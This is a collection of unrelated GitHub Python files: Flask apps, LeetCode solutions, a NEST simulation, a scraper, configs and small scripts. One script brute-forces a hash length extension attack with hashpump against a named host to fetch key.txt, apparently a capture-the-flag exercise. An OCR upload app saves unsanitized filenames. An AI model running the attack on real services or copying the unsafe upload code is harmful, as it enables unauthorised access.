SubmitField('Submit')\n\n@app.route('/', methods=['GET', 'POST'])\n@app.route('/home', methods=['GET', 'POST'])\ndef register():\n error = \"\"\n form = BasicForm()\n\n if request.method == 'POST':\n first_name = form.first_name.data\n last_name = form.last_name.data\n date = form.date.data\n Integer = form.Integer.data\n Float = form.Float.data\n Select = form.Select.data\n\n if len(first_name) == 0 or len(last_name) == 0:\n error = \"Please supply both first and last name\"\n else:\n return 'Thank you ' + first_name +' '+ last_name +' '+ ' Favouraite number: ' + str(Integer) + ' & ' + str(Float)\n\n return render_template('home.html', form=form, message=error)\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')\n","repo_name":"aaboungab/Flask-apps","sub_path":"Flask_CreatingForm/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"71612725571","text":"# Given a string with lowercase or uppercase letters only, if you are allowed to replace no more than ‘k’ letters with any letter, find the length of the longest substring having the same letters after replacement.\n\n# Examples\n\n# Input: String=\"aabccbb\", k=2\n# Output: 5\n# Explanation: Replace the two 'c' with 'b' to have a longest repeating substring 
\"bbbbb\".\n\n# Input: String=\"abbcb\", k=1\n# Output: 4\n# Explanation: Replace the 'c' with 'b' to have a longest repeating substring \"bbbb\".\n\n# Input: String=\"abccde\", k=1\n# Output: 3\n# Explanation: Replace the 'b' or 'd' with 'c' to have the longest repeating substring \"ccc\".\n\n# Input:\n# s = \"ABAB\", k = 2\n\n# Output:\n# 4\n\n# Explanation:\n# Replace the two 'A's with two 'B's or vice versa.\n\n\nclass Solution:\n\tdef characterReplacement(self, s, k):\n\t\tmaxLen, windowStart, maxRepeatingLetterCount = 0, 0, 0\n\t\tcharacterFrequency = {}\n\t\tfor windowEnd in range(len(s)):\n\t\t\trightChar = s[windowEnd]\n\t\t\tif rightChar not in characterFrequency:\n\t\t\t\tcharacterFrequency[rightChar] = 0\n\t\t\tcharacterFrequency[rightChar] += 1\n\t\t\tmaxRepeatingLetterCount = max(maxRepeatingLetterCount, characterFrequency[rightChar])\n\t\t\tif (windowEnd - windowStart + 1 - maxRepeatingLetterCount) > k:\n\t\t\t\tleftChar = s[windowStart]\n\t\t\t\tcharacterFrequency[leftChar] -= 1\n\t\t\t\twindowStart += 1\n\t\t\tmaxLen = max(maxLen, windowEnd - windowStart + 1)\n\t\treturn maxLen\n\nsolution = Solution()\nprint(solution.characterReplacement(\"abbcb\", 1))\n","repo_name":"kohli6010/leetcode","sub_path":"longestsubstringwithsamelettersafterreplacement.py","file_name":"longestsubstringwithsamelettersafterreplacement.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"13527343905","text":"class Solution:\n def process_input(self, strs):\n self.weights = []\n for s in strs:\n c_s = Counter(s)\n self.weights.append((c_s.get('0', 0), c_s.get('1', 0)))\n \n def run(self,m,n,idx,L):\n if idx < 0 or idx == L or m<0 or n<0:\n return 0\n key = (m,n,idx)\n if key in self.table:\n return self.table[key]\n a,b = self.weights[idx]\n first = 0\n if m-a >= 0 and n-b>=0:\n first = 1 + self.run(m-a, n-b, idx-1,L)\n second = self.run(m,n, idx-1,L)\n \n self.table[key] = max(first, second)\n return self.table[key]\n \n def findMaxForm(self, strs: List[str], m: int, n: int) -> int:\n self.process_input(strs)\n self.table = {}\n ans = self.run(m, n, len(self.weights)-1, len(self.weights))\n return ans","repo_name":"RishitToteja/Leetcode-Questions","sub_path":"474-ones-and-zeroes/474-ones-and-zeroes.py","file_name":"474-ones-and-zeroes.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"30731720450","text":"class Human:\n def __init__(self, name, surname, age):\n self.name = name\n self.surname = surname\n self.age = age\n\n def allowed_in_the_club(self):\n if self.age >= 18:\n return True\n return False\n\n def __repr__(self):\n return f'''\n Name:\\t\\t{self.name}\n Surname:\\t{self.surname}\n Age:\\t\\t{self.age}\n ''' \n\nprint('Enter Person(s) Details and enter \"exit\" to stop\\n\\n')\nflag = True\ncount = 1\npeople = []\n\nwhile flag:\n print(f\"person {count}'s details\")\n try:\n name = input('Name:\\t\\t')\n surname = input('Surname:\\t')\n age = int(input('Age:\\t\\t'))\n \n person = Human(name, surname, age)\n people.append(person)\n\n print('\\n')\n answer = input('continue? 
(type exit to stop)\\t')\n        print('\\n\\n')\n\n        if answer.lower() == 'exit':\n            flag = False\n            continue\n        count += 1\n\n    except ValueError as e:\n        print(e)\n# Report on the people entered (use the list length; count stops incrementing on exit)\nif len(people) > 1:\n    print(f'These are the {len(people)} people going to the club')\nelif len(people) == 1:\n    print('There is 1 person going to the club')\nelse:\n    print('There are no people going to the club')\nfor person in people:\n    print(person.__repr__()+f'Allowed in:\\t{person.allowed_in_the_club()}\\n\\n')\n\n\n","repo_name":"Mesh542/Unit-Testing-in-Python","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"39883681487","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 4 17:49:10 2018\nThis script allows you to create a neural network, save the spike times and the \ndata recorded by a \"digital\" multimeter. \n@author: Max\n\"\"\"\n#into console: %reset -f\nprint(__doc__)\nfrom pathlib import Path\nimport sys\nimport nest\nimport numpy as np\nimport nest.topology as topp\nfrom create_spike_times_methods import get_data\nfrom create_spike_times_methods import time_series_split\nfrom create_spike_times_methods import spike_times_split\n#from create_fluorescent_data_functions import SimulationParameters\n#from create_fluorescent_data_functions import NeuralModelParameters\nimport scipy.io as sio\n\ndef create_spike_times(Sim, NModel):\n    \n    if Sim.overwrite_files == \"no\":\n        if Sim.data_folder.is_dir()==True:\n            print(\"You are not allowed to overwrite the files.\")\n            sys.exit(\"Error message\")\n        else:\n            Sim.data_folder.mkdir(parents=True)\n    elif Sim.overwrite_files == \"yes\":\n        if Sim.data_folder.is_dir()==True:\n            print(\"You have overwritten old files.\")\n        else:\n            Sim.data_folder.mkdir(parents=True)\n    else:\n        print(\"You have two options for overwrite files\")\n    \n    connections_path = Sim.data_folder / \"connections.txt\"\n    spikes_path = Sim.data_folder / \"spikes.mat\"\n    spikes_split_path = Sim.data_folder / \"spikes_split.mat\"\n    multimeter_data_path = Sim.data_folder / \"multimeter_data.mat\"\n    hyperparameters_path = Sim.data_folder / \"hyperparameters.mat\"\n    position_path = Sim.data_folder / \"position.mat\"\n    \n    # Define important simulation parameters\n    nest.ResetKernel()\n    seed=1008.0\n    nest.SetKernelStatus({\"resolution\": Sim.resolution,\n                          \"print_time\": True,\n                          \"overwrite_files\":True,\n                          \"grng_seed\": int(seed),\n                          \"rng_seeds\": [int(seed)]\n                          })\n    \n    # Construct the position grid of the neural network(NN)\n    jit = 0.03\n    if NModel.nr_neurons==100:\n        xs = np.arange(-0.45,.451,0.1) # defines the size of the network\n    elif NModel.nr_neurons==16:\n        xs = np.arange(-0.15,.151,0.1)\n    else:\n        print(\"Current network can consist of 16 or 100 neurons.\")\n    np.random.seed(int(seed))\n    pos = [[x,y] for y in xs for x in xs]\n    pos = [[p[0]+np.random.uniform(-jit,jit),p[1]+np.random.uniform(-jit,jit)] for p in pos]\n    \n    # Construct the neurons on the grid and establish connections between them.\n    # The probability of connection varies with the distance between the neurons\n    # Define synapse connections\n    nest.SetDefaults(\"tsodyks_synapse\",{\"delay\": NModel.t_delay, #1.5 in Stetter's code\n                                        \"tau_rec\": NModel.tau_rec,\n                                        \"tau_fac\":0.0,\n                                        \"U\": NModel.U\n                                        })\n    conn1 = { \"connection_type\":\"divergent\",\n            \"mask\": {\"circular\":{\"radius\":0.75}},\n            \"kernel\": {\"gaussian\":{\"p_center\":1.,\"sigma\":0.15}}, #0.15 for 100 neurons\n            \"allow_autapses\":False,\n            \"synapse_model\":\"tsodyks_synapse\",\n            
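# weight assigned to each created connection (alpha_int: presumably the network-internal synaptic strength)\n            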
\"weights\": NModel.alpha_int\n }\n \n # specify the neural model\n neuron_param= {\n #\"I_e\" : 0.0,\n \"C_m\" : 1.0,\n \"tau_m\" : NModel.tau_m,\n \"t_ref\" : NModel.tau_s, #refactory periods in ms 2.0 is default\n \"E_L\" : 0.0,\n \"V_th\" : NModel.V_thres,\n \"V_m\" : 0.0,\n \"V_reset\" : 0.0\n }\n nest.SetDefaults(\"iaf_psc_alpha\", neuron_param)\n \n layer_dict_ex = {\"positions\": pos,\n \"extent\" : [1.1,1.1],\n \"elements\" : \"iaf_psc_alpha\"}\n layer = topp.CreateLayer(layer_dict_ex)\n \n topp.ConnectLayers(layer,layer,conn1)\n \n # Plot layer\n topp.PlotLayer(layer)\n \n # change the seed for different Poisson spike trains\n nest.SetKernelStatus({\n 'grng_seed': int(seed),\n 'rng_seeds': [int(seed)]\n })\n \n # Creation of a poisson generator\n nest.CopyModel('poisson_generator', 'PG',\n params={'rate': NModel.poisson_spike_rate}) #1.6 in the paper, I don't know why they changed it in the programm\n pg = topp.CreateLayer({ 'rows' : 1,\n 'columns' : 1,\n 'elements' : 'PG'})\n cdict_stim = {'connection_type' : 'divergent',\n 'weights': NModel.alpha_ext}\n topp.ConnectLayers(pg,layer,cdict_stim)\n \n # create multimeter\n nrns=nest.GetLeaves(layer,local_only=True)[0]\n multimeter = nest.Create(\"multimeter\", NModel.nr_neurons)\n nest.SetStatus(multimeter, {\"withtime\":True, \"record_from\":[\"V_m\",\"I_syn_ex\"],\"interval\":Sim.interval}) #, \"input_currents_ex\",\"input_currents_in\"\n nest.Connect(multimeter,nrns,\"one_to_one\")\n \n # Create spike detector\n sd1 = nest.Create('spike_detector')\n nest.SetStatus(sd1,{'precise_times':True})\n nest.Connect(nrns,sd1)\n \n # Simulate\n nest.Simulate(Sim.sim_length + Sim.interval)\n \n # Retrieve the generated data\n [potential,currents_ex,spikes,time]=get_data(multimeter,sd1,NModel.nr_neurons,Sim.nr_samples)\n \n # Save the spikes to a file\n spikesdict={'N1':spikes}\n sio.savemat(str(spikes_path),spikesdict)\n \n if Sim.P>1:\n potential_fin = time_series_split(potential,Sim.P)[0]\n currents_ex_fin = time_series_split(currents_ex,Sim.P)[0]\n spikesdict_split = spike_times_split(spikes, Sim.sim_length, Sim.P)\n else:\n potential_fin=potential\n currents_ex_fin=currents_ex\n spikesdict_split = {'N1':spikes}\n \n # Pass important hyperparameters to create_fluorescent_data_from_spike_times.py\n hyperdict = {\n 'P' : Sim.P,\n 'length_ts' : Sim.length_ts,\n 'nr_samples' : Sim.nr_samples,\n 'nr_neurons' : NModel.nr_neurons,\n 'interval' : Sim.interval\n \n }\n sio.savemat(str(hyperparameters_path),hyperdict)\n # save the position\n sio.savemat(str(position_path), {'position' : pos})\n\n # save the results\n sio.savemat(str(multimeter_data_path),mdict={ 'potential' : potential_fin,\n 'input_currents_ex': currents_ex_fin\n })\n sio.savemat(str(spikes_split_path),spikesdict_split)\n \n topp.DumpLayerConnections(layer,'tsodyks_synapse',str(connections_path))","repo_name":"stieberm/inference_BNN","sub_path":"create_spike_times.py","file_name":"create_spike_times.py","file_ext":"py","file_size_in_byte":6751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"44925806613","text":"from requests.auth import HTTPProxyAuth\n\nfrom utils.proxy_utils.proxy import Proxy, ua\nimport requests\nimport config\n\n\nclass ReqestClient(Proxy):\n def __init__(self):\n super().__init__()\n\n def request_with_proxy_header(self, url):\n header = {'User-Agent': ua.user_agent()}\n\n if config.USE_PROXY_SERVER:\n proxy = self.generate_proxy()\n auth = HTTPProxyAuth(\"\", \"\")\n try:\n response = 
requests.get(url, proxies=proxy, auth=auth, headers=header, timeout=20, verify=True)\n                return response\n            except requests.RequestException:\n                # remove the invalid proxy from the proxy list and update in the file\n                self.proxy_list.remove(proxy.get(\"http\"))\n                self.write_proxy_list()\n        else:\n            try:\n                response = requests.get(url, headers=header, timeout=20, verify=True)\n            except requests.RequestException:\n                response = None\n\n        return response\n\n\nif __name__ == '__main__':\n    cli = RequestClient()\n    print(cli.request_with_proxy_header(\"https://www.wikipedia.org/\").text)\n","repo_name":"MLArtist/WebScraper","sub_path":"webscraper/utils/request_client.py","file_name":"request_client.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"43"} +{"seq_id":"11959550068","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ne = 0.5\nk = 1\nk1 = 1\nk2 = 1\ng = 1\nphi = 1\nD = 1\n\nn = 1\n\nF = lambda x: 1 - e*(1 + np.power(k2/k1*np.power(x,-1) + 1 + g*phi/k1, -1))\n\nG = lambda x: phi/k/n*(1+g*x)*(1+(k+g*phi)/D*x)\n\ny = lambda x: n/(1 + (k + g*phi)/D*x)\n\n#F = lambda x: -k*e*y(x)/(k1*k2/(k2+g*phi*x) - (k1+g*phi))\n\n#G = lambda x: (phi*(1+g*x)-k*(1-e)*y(x))/(k1*k2/(k2+g*phi*x) - k1)\n\nx = np.linspace(0.01, 1)\nplt.plot(x, F(x))\nplt.plot(x, G(x))\n#plt.xlim(0,1)\n#plt.ylim(0,)\nplt.show()","repo_name":"saishun01/texreport1","sub_path":"riroen2/steady_state.py","file_name":"steady_state.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"29988680551","text":"import random\nimport re\n\n\n#ready_nodes = [\"control-plane\", \"slave-one\", \"slave-two\"]\n#print(ready_nodes[0])\n#print(ready_nodes[1])\n#print(ready_nodes[2])\n\ndef _get_ready_nodes():\n    ready_nodes = [\"control-plane\", \"slave-one\", \"slave-two\"]\n\n    return ready_nodes\n\n\ndef _get_schedulable_node():\n    node_list = _get_ready_nodes()\n\n    #print(node_list[0])\n    if not node_list:\n        return None\n    available_nodes = list(set(node_list))\n\n    #print(available_nodes)\n\n\n    # THIS IS THE FUNCTION I NEED TO SWAP INTO THE OTHER CODE (STILL TO BE TESTED)\n    # THIS WAY, INSTEAD OF RETURNING A RANDOM NODE TO ASSIGN THE POD TO,\n    # I PICK A SPECIFIC NODE BASED ON THE NAME I SUPPLY.\n    # SO A MATCH IS MADE BETWEEN THE NAME I SUPPLY AND THE NODE NAME\n    # FOUND IN THE PREVIOUSLY BUILT ARRAY (OF THE AVAILABLE NODES).\n    specific_node = [item for item in available_nodes\n                     if re.search(\"slave-one\", item) is not None]\n\n    #my_string = \" \".join(my_sentence)\n\n    node = \" \".join(specific_node)\n\n    return node\n\n\nprint(_get_ready_nodes())\nprint(_get_schedulable_node())","repo_name":"lors10/PythonExemples","sub_path":"funzioni-k8s-v1.py","file_name":"funzioni-k8s-v1.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"39478040135","text":"from flask import Flask, render_template,request\nimport os\nfrom PIL import Image\nimport pytesseract\n\napp=Flask(__name__)\nbasedir = os.path.abspath(os.path.dirname(__file__))\n@app.route(\"/\")\ndef hello_world():\n    result_text = \"xxxxxx\"\n    return render_template('index.html',result = result_text)\n\n@app.route(\"/up_photo\",methods=['POST'])\ndef up_photo():\n    img = request.files.get('txt_photo')\n    path = basedir\n    file_path=path+\"/\"+ img.filename\n    img.save(file_path)\n    text=pytesseract.image_to_string(Image.open(file_path), lang='chi_sim')\n    
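# debug output: log where the upload was stored and confirm this handler ran\n    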
print(file_path)\n    print(\"in up photo\")\n    return \"success:\" + text\n\n@app.route(\"/upphoto\",methods=['POST'])\ndef upphoto():\n    img = request.files.get('txt_photo')\n    path = basedir\n    file_path=path + \"/\"+img.filename\n    img.save(file_path)\n    text=pytesseract.image_to_string(Image.open(file_path), lang='chi_sim')\n    return render_template('index.html',result=text)\n\nif __name__ == '__main__':\n    app.run(debug=True,host='0.0.0.0',port=int(os.environ.get('PORT', 8080)))\n\n","repo_name":"mayidudu/jnocr","sub_path":"data/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"39233282406","text":"import json\nimport os\n\n# Get the absolute path of the directory where params.py is located\ndir_path = os.path.dirname(os.path.abspath(__file__))\n\n# Construct the absolute path for params.json\nparams_file_path = os.path.join(dir_path, \"params.json\")\n\nwith open(params_file_path, \"r\") as f:\n    params = json.load(f)\n\nALIAS_LENGTH = params[\"ALIAS_LENGTH\"]\nPUBKEY_LENGTH = params[\"PUBKEY_LENGTH\"]\nSIG_LENGTH = params[\"SIG_LENGTH\"]\nNYM_MAX_LENGTH = params[\"NYM_MAX_LENGTH\"]\nINDICATOR_LEN = params[\"INDICATOR_LEN\"]\nHEADER_LENGTH = params[\"HEADER_LENGTH\"]\nEPOCH_TIME = params[\"EPOCH_TIME\"]\nSLACK_EPOCHS = params[\"SLACK_EPOCHS\"]\nFORWARD_SLACK_EPOCHS = params[\"FORWARD_SLACK_EPOCHS\"]\nSYNC_EPOCHS = params[\"SYNC_EPOCHS\"]\nDB_INT_LENGTH = params[\"DB_INT_LENGTH\"]\nRESET = params[\"RESET\"]\nSEQUENCER_IP = params[\"SEQUENCER_IP\"]\nSEQUENCER_PORT = params[\"SEQUENCER_PORT\"]\nSEQUENCER_PUBKEY = params[\"SEQUENCER_PUBKEY\"]\n\nDELAY = FORWARD_SLACK_EPOCHS+1+SLACK_EPOCHS+SYNC_EPOCHS\nMAX_MESSAGE_LENGTH = 2**12-1#-ALIAS_LENGTH*2-DB_INT_LENGTH\nPARENT_LENGTH = ALIAS_LENGTH+DB_INT_LENGTH\n\nRUN_EXTERNALLY = True","repo_name":"SirLemmings/SemaphoreV0","sub_path":"params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"7574648289","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\nfrom datetime import date\n\nAUTHOR = u'Alessandro Tanasi'\nSITENAME = u\"Alessandro Tanasi @jekil's blog\"\nSITETITLE = u\"jekil's blog\"\nSITESUBTITLE = u\"%s's thoughts\" % AUTHOR\nSITEDESCRIPTION = '%s\\'s Thoughts and Writings' % AUTHOR\nSITELOGO = '//en.gravatar.com/userimage/1102835/a961dde28318778e338efdf517ea68cb.png?size=120'\nROBOTS = 'index, follow'\n\n# Paths.\nPATH = 'content'\nSTATIC_PATHS = ['images', 'public', 'static']\nARTICLE_PATHS = ['blog']\nARTICLE_SAVE_AS = 'blog/{date:%Y}/{slug}.html'\nARTICLE_URL = 'blog/{date:%Y}/{slug}.html'\nPAGE_URL = 'pages/{slug}/'\nPAGE_SAVE_AS = 'pages/{slug}/index.html'\nDELETE_OUTPUT_DIRECTORY = False\nOUTPUT_RETENTION = ['.git']\n\n# Style.\nTHEME = \"pelican-themes/flex\"\nBROWSER_COLOR = '#333'\nPYGMENTS_STYLE = 'github'\nTYPOGRIFY = True\nSUMMARY_MAX_LENGTH = 100\n#DOCUTILS_SETTINGS = {'doctitle_xform': False }\n\n# Locals.\nTIMEZONE = 'Europe/London'\nDEFAULT_LANG = u'en'\nOG_LOCALE = 'en_US.UTF-8'\nLOCALE = 'en_US.UTF-8'\nDATE_FORMATS = {\n    'en': '%B %d, %Y',\n}\nDEFAULT_PAGINATION = 5\n\n# Debug options.\nLOAD_CONTENT_CACHE = False\nUSE_LESS = True\n\n# Blog conf.\nMAIN_MENU = True\nLINKS_IN_NEW_TAB = 'external'\nUSE_FOLDER_AS_CATEGORY = False\nEXTRA_PATH_METADATA = {\n    'static/robots.txt': {'path': 'robots.txt'},\n    'static/favicon.ico': {'path': 
'favicon.ico'},\n    'static/CNAME': {'path': 'CNAME'},\n    'static/.well-known/security.txt': {'path': '.well-known/security.txt'},\n}\nDEFAULT_METADATA = {\n    'status': 'draft',\n}\nCOPYRIGHT_YEAR = date.today().year\n\n# Feeds.\nFEED_DOMAIN = 'http://feeds.feedburner.com'\nFEED_ALL_ATOM = 'jekil_is_sexy'\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n# Blogroll\n#LINKS = (('Pelican', 'http://getpelican.com/'),\n#         ('Python.org', 'http://python.org/'),\n#         ('Jinja2', 'http://jinja.pocoo.org/'),\n#         ('You can modify those links in your config file', '#'),)\n\n# Social widget\nSOCIAL = (('envelope-o', 'mailto:alessandro@tanasi.it'),\n          ('linkedin', 'https://www.linkedin.com/in/alessandrotanasi'),\n          ('github', 'https://github.com/jekil'),\n          ('twitter', 'https://twitter.com/jekil'),\n          # ('instagram', 'https://www.instagram.com/jekilcoso/'),\n          ('rss', 'http://feeds.feedburner.com/jekil_is_sexy'),\n          )\nTWITTER_USERNAME = 'jekil'\nGITHUB_URL = 'https://github.com/jekil'\n\n# Uncomment following line if you want document-relative URLs when developing\n#RELATIVE_URLS = True\n\nMENUITEMS = (('Archives', '/archives.html'),\n             ('Categories', '/categories.html'),\n             ('Tags', '/tags.html'),)\n\nCC_LICENSE = {\n    'name': 'Creative Commons Attribution-ShareAlike',\n    'version': '4.0',\n    'slug': 'by-sa'\n}\nCC_LICENSE_IMG = False\n\nSITEMAP = {\n    'format': 'xml',\n    'priorities': {\n        'articles': 0.6,\n        'indexes': 0.6,\n        'pages': 0.5,\n    },\n    'changefreqs': {\n        'articles': 'monthly',\n        'indexes': 'daily',\n        'pages': 'monthly',\n    }\n}\n\n# Plugins.\nPLUGIN_PATHS = ['./pelican-plugins']\nPLUGINS = ['sitemap', 'post_stats', 'pelican_alias', 'pelican_youtube']\n","repo_name":"jekil/jekil.sexy","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"12681616012","text":"#!/usr/bin/env python3\n\nimport subprocess\nimport requests\n\n\ndef brute_force_length_extension(signature, data, additional, start_length=1, stop_length=256):\n    \"\"\"Execute a hash length extension attack without knowing the length of the unknown data\"\"\"\n    for i in range(start_length, stop_length):\n        stdoutdata = subprocess.getoutput(f\"hashpump -s '{signature}' -d '{data}' -a '{additional}' -k {i}\")\n        signature, data = stdoutdata.split('\\n')\n        \n        # URL encode the hex values\n        data = data.replace('\\\\x', '%')\n\n        r = requests.get(\"http://9d479e5cc471d1fe1b8f.pnt.st/getfile\", params=f'filename={data}&signature={signature}')\n        if r.status_code != 401:\n            print(r.text)\n\n        print(f\"{i}: {r.status_code}\")\n\n\nbrute_force_length_extension(signature=\"28cf3cbd57c7cf8e5da36a9a5651ede7e7972f2d1e202b8f4be9a22a00639b03\", data=\"supersecret.rb\", additional=\"/key.txt\")\n","repo_name":"CameronLonsdale/crypto_experiments","sub_path":"brute_force_length_extension.py","file_name":"brute_force_length_extension.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"39555280795","text":"import torch as T\nimport torch.nn.functional as F\nimport numpy as np\nfrom networks.ddpg_net import Actor, Critic\nfrom utils.buffer import ReplayBuffer\nfrom utils.OUAnoise import OUActionNoise\n\nclass Agent():\n    def __init__(self, env, n_inputs, n_actions, tau = 0.001, gamma = 0.99, buffer_size = int(1e6), batch_size = 64) -> None:\n        self.tau = tau\n        self.gamma = 
gamma\n self.buffer_size = buffer_size\n self.batch_size = batch_size\n self.env = env\n\n self.actor = Actor(n_inputs=n_inputs, n_actions=n_actions)\n self.actor_target = Actor(n_inputs=n_inputs, n_actions=n_actions)\n self.actor_target.load_state_dict(self.actor.state_dict())\n\n self.critic = Critic(n_inputs=n_inputs, n_actions=n_actions)\n self.critic_target = Critic(n_inputs=n_inputs, n_actions=n_actions)\n self.critic_target.load_state_dict(self.critic.state_dict())\n\n self.replay_buffer = ReplayBuffer(max_size = buffer_size, input_shape = n_inputs, n_actions = n_actions)\n \n self.noise = OUActionNoise(mu=np.zeros(n_actions))\n\n self.update_network_parameters(tau=1)\n\n def store_transition(self, state, action, next_state, reward, done):\n self.replay_buffer.store(state=state, action=action, state_=next_state, rewards=reward, done=done)\n\n def choose_action(self, state):\n self.actor.eval()\n state = T.tensor(np.array([state]))\n mu = self.actor(state).to(self.actor.device)\n mu_prime = mu + T.tensor(self.noise(), dtype = T.float).to(self.actor.device)\n\n self.actor.train()\n \n return mu_prime.cpu().detach().numpy()[0]\n\n def learn(self):\n if self.replay_buffer.mem_count < self.batch_size:\n return\n\n states, actions, rewards, states_, dones = self.replay_buffer.sample(self.batch_size)\n\n states = T.tensor(states, dtype=T.float).to(self.actor.device)\n actions = T.tensor(actions, dtype=T.float).to(self.actor.device)\n states_ = T.tensor(states_, dtype=T.float).to(self.actor.device)\n rewards = T.tensor(rewards, dtype=T.float).to(self.actor.device)\n dones = T.tensor(dones).to(self.actor.device)\n\n \n\n target_actions = self.actor_target(states_)\n next_q = self.critic_target(states_, target_actions)\n q = self.critic(states, actions)\n\n next_q[dones] = 0.0\n next_q = next_q.view(-1)\n\n target = rewards + self.gamma * next_q\n target = target.view(self.batch_size, 1)\n\n self.critic.optimizer.zero_grad()\n critic_loss = F.mse_loss(target, q)\n critic_loss.backward()\n self.critic.optimizer.step()\n\n self.actor.optimizer.zero_grad()\n actor_loss = -self.critic(states, self.actor(states))\n actor_loss = T.mean(actor_loss)\n actor_loss.backward()\n self.actor.optimizer.step()\n\n self.update_network_parameters()\n\n def update_network_parameters(self, tau=None):\n if tau is None:\n tau = self.tau\n\n actor_params = self.actor.named_parameters()\n critic_params = self.critic.named_parameters()\n actor_target_params = self.actor_target.named_parameters()\n critic_target_params = self.critic_target.named_parameters()\n\n actor_state_dict = dict(actor_params)\n critic_state_dict = dict(critic_params)\n actor_target_state_dict = dict(actor_target_params)\n critic_target_state_dict = dict(critic_target_params)\n\n for name in critic_state_dict:\n critic_state_dict[name] = tau*critic_state_dict[name].clone() + (1-tau)*critic_target_state_dict[name].clone()\n\n for name in actor_state_dict:\n actor_state_dict[name] = tau*actor_state_dict[name].clone() + (1-tau)*actor_target_state_dict[name].clone()\n\n self.actor_target.load_state_dict(actor_state_dict)\n self.critic_target.load_state_dict(critic_state_dict)\n\n def run(self, n_games):\n scores = []\n for i in range(n_games):\n score = 0\n done = False\n state = self.env.reset()\n self.noise.reset()\n\n while not done:\n action = self.choose_action(state)\n state_, reward, done, info = self.env.step(action)\n score += reward\n self.env.render()\n\n self.store_transition(state=state, action=action, next_state=state_, reward=reward, 
done=done)\n self.learn()\n state = state_\n\n # agent.learn()\n scores.append(score)\n avg_score = np.mean(scores[-100:])\n print('episode', i, 'score %.1f' % score, 'average score %.2f' % avg_score)\n\n self.env.close()\n \n\n\n \n\n","repo_name":"FlutteryEmbers/DeepLearning","sub_path":"Reinforcement Learning/agent/DDPG.py","file_name":"DDPG.py","file_ext":"py","file_size_in_byte":4753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"18032141557","text":"from imgx.io.load import load_as_ppm\nfrom imgx.io.save import save_as_ppm\nfrom imgx.io import visualization as vs\nfrom imgx.mask.masks import MedianSpatialMask, OverlapStrategy\nimport time\n\n\ndef executar(normal_image_path, noised_image_path) :\n load_normal_start = time.time()\n normal_img = load_as_ppm(normal_image_path)\n load_normal_end = time.time()\n load_noise_start = time.time()\n img_just_noise = load_as_ppm(noised_image_path)\n load_noise_end = time.time()\n smoothing_start = time.time()\n img_just_smooth = img_just_noise.apply_mask(MedianSpatialMask(size=3, overlap_strategy=OverlapStrategy.CROP,\n params={'order': 70}))\n smoothing_end = time.time()\n save_result_start = time.time()\n save_as_ppm(img_just_smooth, normal_image_path.replace('normal', 'result', 1))\n save_result_end = time.time()\n\n print(f'Normal Image load time: {load_normal_end - load_normal_start} seconds.')\n print(f'Noised Image load time: {load_noise_end - load_noise_start} seconds.')\n print(f'Smoothing time: {smoothing_end - smoothing_start} seconds.')\n print(f'Saving time: {save_result_end - save_result_start} seconds.')\n\n vs.plot_images([vs.PrintableAxe(normal_img, \"Normal Image\"),\n vs.PrintableAxe(img_just_noise, \"Noised Image\"),\n vs.PrintableAxe(img_just_smooth, \"Smoothed Image\")], markers=True)\n\n\nif __name__ == '__main__':\n print(f'first test case is starting')\n executar('../image_samples/normal/grupo_02_linhas_46_palavras_300.pbm', 'image_samples/noised/grupo_02_linhas_46_palavras_300.pbm')\n print(f'second test case is starting')\n executar('../image_samples/normal/grupo_02_linhas_48_palavras_500.pbm', 'image_samples/noised/grupo_02_linhas_48_palavras_500.pbm')\n print(f'third test case is starting')\n executar('../image_samples/normal/grupo_02_linhas_52_palavras_600.pbm', 'image_samples/noised/grupo_02_linhas_52_palavras_600.pbm')\n\n","repo_name":"eduardo-fillipe/imgx-framework","sub_path":"use_cases/ocr/first_stage/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"15504165639","text":"from render_big import init_render, update_render, finalize_render\nfrom game import *\nfrom time import sleep\n\n\ngame_size = 30 # num x and y cells\ngame_rate = 10 # fps\ngame_length = 500 # number of iterations to perform\n\ndef main():\n # initialize\n game_state = init_game(game_size)\n game_state = create_blinker(2, 2, game_state)\n game_state = create_beacon(5, 5, game_state)\n game_state = create_glider(5, 